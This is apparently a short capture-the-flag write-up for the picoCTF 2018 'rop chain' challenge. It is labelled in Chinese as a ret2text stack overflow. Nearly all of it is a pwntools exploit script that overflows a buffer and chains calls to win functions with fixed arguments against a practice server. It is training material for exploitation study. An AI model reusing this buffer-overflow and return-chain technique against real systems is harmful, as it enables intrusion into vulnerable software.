pwn | picoctf_2018_rop chain
栈溢出ret2text。
exp:
from pwn import *
context.log_level = 'debug'
p_vuln = 0x08048714
p_win1 = 0x080485CB
p_win2 = 0x080485D8
p_flag = 0x0804862B
# p = process('./PicoCTF_2018_rop_chain')
p = remote('node4.buuoj.cn', 26914)
p.recvuntil('input> ')
p.sendline(b'M'*(0x18+4) + p32(p_win1) + p32(p_win2) + p32(p_flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD))
p.interactive()